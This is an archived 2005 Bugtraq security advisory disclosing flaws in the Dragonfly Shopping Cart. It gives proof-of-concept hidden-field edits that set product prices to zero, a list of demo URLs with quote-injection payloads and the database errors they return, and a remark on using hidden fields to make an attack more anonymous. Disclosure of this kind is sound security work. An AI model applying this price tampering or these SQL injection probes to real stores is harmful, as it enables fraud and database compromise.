Dragonfly Shopping Cart Multiple vulnerabilities

dcrab_at_hackerscenter.com
Date: 07/12/05

  • Next message: Anonymous_at_Anonymous.com: "Full Disclosure - XMLRPC Exploit Code written in Python jul 2005" 
    Date: 12 Jul 2005 08:53:52 -0000
To: bugtraq@securityfocus.com
    ('binary' encoding is not supported, stored as-is) Dcrab 's Security Advisory
    http://icis.digitalparadox.org/~dcrab
    http://www.hackerscenter.com/

    Get Dcrab's Services to audit your Web servers, scripts, networks, etc or even code them. Learn more at http://www.dbtech.org

    Severity: High
    Title: Dragonfly Shopping Cart Multiple vulnerabilities
    Date: 11/07/2005

    Vendor: DragonFly Shopping Cart
    Vendor Website: http://www.incredibleinteractive.com/Active/dc_Productsview.asp?key=5
    Summary: Vulnerabilities exist in Dragonfly Shopping Cart that allow modifiying of prices along with Sql injection vulnerabilities.

    Proof of Concept Exploits:

    Hidden Price Value Vulnerability
    You can modify these fields to modify the price of the product and thus be able to purchase the biggest and most expensive products for the cheapest possible prices, or even nothing.
    /demo/dc_Categorieslist.asp
    HPVV

    <input type="hidden" name="x_DragonflyCartProductPrice" value="15.49" size="4">

    /demo/dc_Categoriesview.asp
    HPVV

    <input type="hidden" name="x_DragonflyCartProductPrice" value="0" size="4">

    /demo/dc_productslist.asp
    HPVV

    <input type="hidden" name="x_DragonflyCartProductPrice" value="0" size="4">

    /demo/dc_productslist_Clearance.asp
    HPVV

    <input type="hidden" name="x_DragonflyCartProductPrice" value="0" size="4">

    There are also many other hidden fields like ip address etc which can be used to make the attack "technically" more anonymous though any normal logging system would catch you ;).

    Sql Injections

    /demo/dc_Categoriesview.asp??key='&RecPerPage=5

    Microsoft JET Database Engine error '80040e07'

    Data type mismatch in criteria expression.

    /demo/dc_Categoriesview.asp, line 1054

    /demo/dc_Categoriesview.asp?key=%26dir%26
    Microsoft JET Database Engine error '80040e14'

    Syntax error (missing operator) in query expression '[CategoryKey] = &dir&'.

    /demo/dc_Categoriesview.asp, line 1054

    /demo/dc_productslist_Clearance.asp

    Microsoft JET Database Engine error '80040e14'

    Syntax error in string in query expression '([ProductActive] = 'show' AND ([ProductClearancePage] = 'yes' AND ProductClearanceStartDate < #7/7/2005# AND ProductClearanceEndDate >= #7/7/2005#)) AND ((([ProductName] LIKE '%1%' OR [ProductDescriptionShort] LIKE '%1%') ' ))'.

    /demo/dc_productslist_Clearance.asp, line 292

    /demo/dc_productslist_Clearance.asp?cmd=%27

    Microsoft JET Database Engine error '80040e14'

    Syntax error in string in query expression '([ProductActive] = 'show' AND ([ProductClearancePage] = 'yes' AND ProductClearanceStartDate < #7/7/2005# AND ProductClearanceEndDate >= #7/7/2005#)) AND ((([ProductName] LIKE '%1%' OR [ProductDescriptionShort] LIKE '%1%') ' ))'.

    /demo/dc_productslist_Clearance.asp, line 292

    /demo/ratings.asp??PID='

    Microsoft JET Database Engine error '80040e14'

    Syntax error (missing operator) in query expression '[ProductKey]=''.

    /demo/ratings.asp, line 68

    /demo/dc_Productsview.asp

    Microsoft JET Database Engine error '80040e07'

    Data type mismatch in criteria expression.

    /demo/dc_Productsview.asp, line 931

    /demo/dc_forum_Postslist.asp?start='

    Microsoft VBScript runtime error '800a000d'

    Type mismatch: 'nTotalRecs'

    /demo/dc_forum_Postslist.asp, line 319

    /demo/dc_forum_Postslist.asp?key_m='

    Microsoft JET Database Engine error '80040e07'

    Data type mismatch in criteria expression.

    /demo/dc_forum_Postslist.asp, line 200

    /demo/dc_forum_Postslist.asp?psearch=1&Submit=Search%20%28%2A%29&psearchtype='

    Microsoft JET Database Engine error '80040e07'

    Data type mismatch in criteria expression.

    /demo/dc_forum_Postslist.asp, line 200

    /demo/dc_forum_Postslist.asp?psearch='&Submit=Search%20%28%2A%29&psearchtype=1

    Microsoft JET Database Engine error '80040e07'

    Data type mismatch in criteria expression.

    /demo/dc_forum_Postslist.asp, line 200

    Author:
    These vulnerabilties have been found and released by Diabolic Crab, Email: dcrab[AT|NOSPAM]hackerscenter[DOT|NOSPAM]com, please feel free to contact me regarding these vulnerabilities. You can find me at, http://www.hackerscenter.com or http://icis.digitalparadox.org/~dcrab. Lookout for my soon to come out book on Secure coding with php.

  • Next message: Anonymous_at_Anonymous.com: "Full Disclosure - XMLRPC Exploit Code written in Python jul 2005"

    Relevant Pages

    • Dreaded Jet DB error 80004005 help needed. What causes this???
      ... I'm trying to understand what causes this error message: ... Microsoft JET Database Engine error '80004005' ... The Microsoft Jet database engine cannot open the file ...
      (microsoft.public.inetserver.asp.db)
    • Re: Humans are lazy.
      ... routines properly, LOL. ... Microsoft JET Database Engine error '80040e14' ...
      (alt.2600)
    • Re: update db
      ... Microsoft JET Database Engine error '80040e07' ... |>> i store in variables. ...
      (microsoft.public.frontpage.programming)
    • Re: Humans are lazy.
      ... routines properly, LOL. ... Microsoft JET Database Engine error '80040e14' ...
      (alt.2600)
    • DTS error -2147467259
      ... It works great if I run the package manually. ... Error source: Microsoft JET Database Engine ... DTSRun OnStart: Copy Data from Results to Results Step ...
      (microsoft.public.sqlserver.dts)